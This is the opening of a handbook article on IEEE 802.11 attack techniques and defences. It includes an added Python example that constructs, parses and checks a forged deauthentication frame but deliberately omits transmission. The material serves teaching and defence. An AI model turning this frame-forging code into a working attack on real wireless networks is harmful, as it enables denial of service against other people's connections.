This article is scheduled to appear in “The Handbook of Information Security”.
Key Words
IEEE 802.11, wireless spoofing, cracking WEP, forged deauthentication,
rogue/Trojan access points, session hijacking, war driving.
Abstract
This article describes IEEE 802.11-specific hacking techniques
that attackers have used, and suggests various defensive measures. We describe
sniffing, spoofing and probing in the context of wireless
networks. We describe how SSIDs can be determined, and how a
sufficiently large number of frames can be collected so that WEP can be
cracked. We show how easy it is to cause denial of service through jamming
and through forged disassociations and deauthentications. We also
explain three man-in-the-middle attacks using wireless networks. We
give a list of selected open-source tools. We summarize the activity
known as war driving. We conclude the article with several recommendations
that will help improve security at a wireless deployment site.
Wireless networks broadcast their packets using radio frequency or
optical wavelengths, so any modern laptop computer within range can listen in. Worse,
an attacker can manufacture new packets on the fly and persuade wireless
stations to accept his packets as legitimate, because nothing in a plain
IEEE 802.11 frame proves who actually transmitted it.
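The previous paragraph's point, that a station cannot tell a forged frame from a genuine one, is easiest to see by laying out the bytes of a deauthentication frame, the frame type the abstract names as a denial-of-service vector. The following is an added example written for this page, not code from the article or its authors. The MAC addresses, sequence number and reason code are made-up test values, and legacy_station_accepts is a simplified model, assumed here for illustration, of how a station without management-frame protection decides to honour such a frame (the later IEEE 802.11w amendment adds that protection; the article does not cover it).

```python
"""Build, decode and check a forged IEEE 802.11 deauthentication frame.

Added example for this page, not code from the article. All addresses,
sequence numbers and reason codes below are constructed test values.
"""
import struct
import zlib

TYPE_MGMT = 0            # frame type 0 = management
SUBTYPE_DEAUTH = 0x0C    # subtype 12 = deauthentication
SUBTYPE_DISASSOC = 0x0A  # subtype 10 = disassociation
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(text):
    """'00:11:22:33:44:55' -> 6 raw bytes."""
    return bytes.fromhex(text.replace(":", ""))


def mac_text(raw):
    """6 raw bytes -> '00:11:22:33:44:55'."""
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, addr1, addr2, addr3, seq, body):
    """Generic 802.11 management frame: 24-byte header, body, 4-byte FCS.

    Frame Control byte 0 packs protocol version (b0-1), type (b2-3) and
    subtype (b4-7); every multi-byte field is little-endian. Nothing here
    proves who sent the frame: addr2 (transmitter) and addr3 (BSSID) are
    six bytes each that the sender simply fills in.
    """
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    duration = struct.pack("<H", 0)
    seq_ctrl = struct.pack("<H", (seq << 4) | 0)  # sequence number in b4-15, fragment 0
    frame = (fc + duration + mac_bytes(addr1) + mac_bytes(addr2)
             + mac_bytes(addr3) + seq_ctrl + body)
    # FCS is a plain CRC-32 (normally appended by the NIC): integrity against
    # noise, not against an attacker, who recomputes it after forging.
    fcs = struct.pack("<I", zlib.crc32(frame) & 0xFFFFFFFF)
    return frame + fcs


def build_deauth(victim, bssid, reason=7, seq=0):
    """Deauthentication 'from the AP' to a station; the body is a 2-byte
    reason code. Reason 7 = class 3 frame received from a nonassociated
    station (an arbitrary choice for this example)."""
    return build_mgmt_frame(SUBTYPE_DEAUTH, victim, bssid, bssid, seq,
                            struct.pack("<H", reason))


def parse_mgmt_frame(frame):
    """Decode the header fields a station looks at, plus the FCS check."""
    fc0 = frame[0]
    info = {
        "version": fc0 & 0x03,
        "type": (fc0 >> 2) & 0x03,
        "subtype": fc0 >> 4,
        "addr1": mac_text(frame[4:10]),
        "addr2": mac_text(frame[10:16]),
        "addr3": mac_text(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
        "fcs_ok": struct.unpack("<I", frame[-4:])[0]
                  == (zlib.crc32(frame[:-4]) & 0xFFFFFFFF),
    }
    body = frame[24:-4]
    if info["type"] == TYPE_MGMT and info["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        info["reason"] = struct.unpack("<H", body[:2])[0]
    return info


def legacy_station_accepts(frame, my_mac, my_bssid):
    """Simplified model (an assumption of this example) of a station without
    management-frame protection: it honours a deauth/disassoc if the FCS is
    good, it is addressed to it or to broadcast, and addr2/addr3 name its AP.
    Every one of those is a field the attacker chose."""
    f = parse_mgmt_frame(frame)
    return (f["fcs_ok"]
            and f["type"] == TYPE_MGMT
            and f["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC)
            and f["addr1"] in (my_mac, BROADCAST)
            and f["addr2"] == my_bssid
            and f["addr3"] == my_bssid)


if __name__ == "__main__":
    ap, client = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"   # constructed values
    forged = build_deauth(client, ap, reason=7, seq=5)
    print(forged.hex())
    print(parse_mgmt_frame(forged))
    print("station drops its association:", legacy_station_accepts(forged, client, ap))
```

Sending the bytes on the air needs a card in monitor mode and raw injection, which this example deliberately leaves out; the point is that the only things the receiving station checks are the CRC and three MAC addresses, all of which the forger sets, and a broadcast addr1 disconnects every station of the BSS with one frame.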
We use the term hacking as described below.
hacker n. [originally,
someone who makes furniture with an axe] 1. A person who
enjoys exploring the details of programmable systems and how to stretch their
capabilities, as opposed to most users, who prefer to learn only the minimum
necessary. 2. One who programs enthusiastically (even
obsessively) or who enjoys programming rather than just theorizing about programming. 3. A
person capable of appreciating hack value. 4. A person who is
good at programming quickly. 5. An expert at a particular
program, or one who frequently does work using it or on it; as in `a Unix
hacker'. (Definitions 1 through 5 are correlated, and people who fit them
congregate.) 6. An expert or enthusiast of any kind. One might
be an astronomy hacker, for example. 7. One who enjoys the
intellectual challenge of creatively overcoming or circumventing
limitations. 8. [deprecated] A malicious meddler
who tries to discover sensitive information by poking around. Hence `password
hacker', `network hacker'. The correct term for this sense is cracker.
From The Jargon Dictionary http://info.astrian.net/jargon/
This article describes IEEE 802.11-specific hacking techniques
that attackers have used, and suggests various defensive measures. It is not an
overview of the security features proposed in WPA or IEEE 802.11i. We do
not consider legal implications, or the intent behind such hacking, whether
malevolent or benevolent. The article’s focus is on describing
techniques, methods, analyses and uses in ways unintended by the
designers of IEEE 802.11.